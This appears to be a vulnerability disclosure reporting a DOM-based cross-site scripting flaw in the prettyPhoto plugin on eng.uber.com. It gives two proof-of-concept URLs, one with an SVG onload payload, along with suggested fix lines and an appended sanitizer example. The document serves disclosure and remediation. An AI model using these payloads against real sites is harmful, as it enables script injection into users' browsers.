Hi. Found DOM XSS on this subdomain eng.uber.com. You are using a vulnerable plugin prettyPhoto…
This XSS will work in Firefox, Chrome - Google and IE last version! And this is very dangerous!
POC
Firefox vector
http://eng.uber.com/#prettyPhoto[i]/x,<svg/onload=alert(document.domain)>/x
POC
Google and IE
http://eng.uber.com/#prettyPhoto[gallery]/1,<a>/
Add screenshot
How to fix the vulnerability: upgrade the plugin or add the filter
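hashIndex = parseInt(hashIndex, 10); // force the index to an integer
// backslash-escape the selector metacharacters in the rel value
hashRel = hashRel.replace(/([ #;&,.+*~':"!^$=>|\/])/g, '\\$1');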
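
The filter above applied to a fragment of the shape used in the PoC URLs, as an added example (not part of the original report and not prettyPhoto's own code). The function name sanitizeGalleryHash, the way the fragment is split, and the final rejection checks are assumptions made for illustration.

```javascript
// Added example. Assumed fragment shape, taken from the PoC URLs in the
// report: #prettyPhoto[<rel>]/<index>/
// sanitizeGalleryHash is a hypothetical helper, not a prettyPhoto function.
function sanitizeGalleryHash(url) {
  const start = url.indexOf('#prettyPhoto');
  if (start === -1) return null;            // no gallery deep link present

  let raw;
  try {
    raw = decodeURI(url.slice(start + 1));  // drop the leading '#'
  } catch (e) {
    return null;                            // malformed percent-encoding
  }

  const slash = raw.indexOf('/');
  if (slash === -1) return null;            // no index part at all

  let hashRel = raw.slice(0, slash);
  let hashIndex = raw.slice(slash + 1);

  // The two lines of the fix from the report:
  hashIndex = parseInt(hashIndex, 10);
  hashRel = hashRel.replace(/([ #;&,.+*~':"!^$=>|\/])/g, '\\$1');

  // Extra checks (assumption, not in the report): refuse anything that did
  // not parse to a non-negative integer, and refuse a rel value that still
  // carries angle brackets, which the filter's character class does not
  // fully cover ('<' is absent from it).
  if (Number.isNaN(hashIndex) || hashIndex < 0) return null;
  if (/[<>]/.test(hashRel)) return null;

  return { rel: hashRel, index: hashIndex };
}
```

Only the returned rel and index should reach selector or DOM code; a null result means the deep link is ignored.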